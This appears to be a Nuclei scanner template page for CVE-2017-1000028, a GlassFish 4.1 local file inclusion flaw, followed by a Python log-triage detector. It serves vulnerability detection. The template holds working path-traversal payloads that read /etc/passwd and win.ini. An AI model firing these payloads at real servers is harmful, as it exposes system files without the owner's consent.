
Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion

ID: CVE-2017-1000028

Severity: high

Author: pikpikcu,daffainfo

Tags: cve,cve2017,oracle,glassfish,lfi,edb

Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.

id: CVE-2017-1000028

info:
  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
  author: pikpikcu,daffainfo
  severity: high
  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.exploit-db.com/exploits/45196
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
    - https://www.exploit-db.com/exploits/45196/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000028
    cwe-id: CWE-22
    epss-score: 0.97516
    epss-percentile: 0.99986
    cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,oracle,glassfish,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
      - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body, 'bit app support')"
          - "contains(body, 'fonts')"
          - "contains(body, 'extensions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100c81d753dce1c23e76f05a5ae87391ad797f6f285f7e64cd711100340de38986902206d8c71839cc01500b28f2a427528b1a4e118e4fee29c650ae96b9ceef7790d7f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-1000028.yaml"
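
The two request paths in the template rely on overlong UTF-8 encodings (%c0%ae decodes leniently to "." and %c0%af to "/"). The sketch below is an added example for server-side log triage, not part of the Nuclei template or the original page; it flags such sequences in access-log lines and reports the normalized path. The log lines and their common-log layout are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines in common log format (assumed layout, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /theme/css/site.css HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=caf%c3%a9 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def decode_overlong(raw):
    """Return (text, found): 2-byte overlong forms (lead byte 0xC0/0xC1) mapped to ASCII."""
    out, i, found = [], 0, False
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # Strict UTF-8 decoders reject these; a lenient one yields an ASCII character.
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            found = True
            i += 2
        else:
            out.append(chr(lead))  # other bytes kept one-to-one (Latin-1) for display
            i += 1
    return "".join(out), found

def scan(lines):
    """Flag requests whose percent-decoded path contains an overlong UTF-8 sequence."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        decoded, overlong = decode_overlong(unquote_to_bytes(m.group(1)))
        if overlong:
            hits.append({
                "path": decoded,
                "traversal": "../" in decoded or "..\\" in decoded,
                "status": int(m.group(2)),  # HTTP status the server logged
            })
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Valid multi-byte UTF-8 such as %c3%a9 is not flagged, because only the lead bytes 0xC0 and 0xC1, which never occur in well-formed UTF-8, are treated as overlong.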
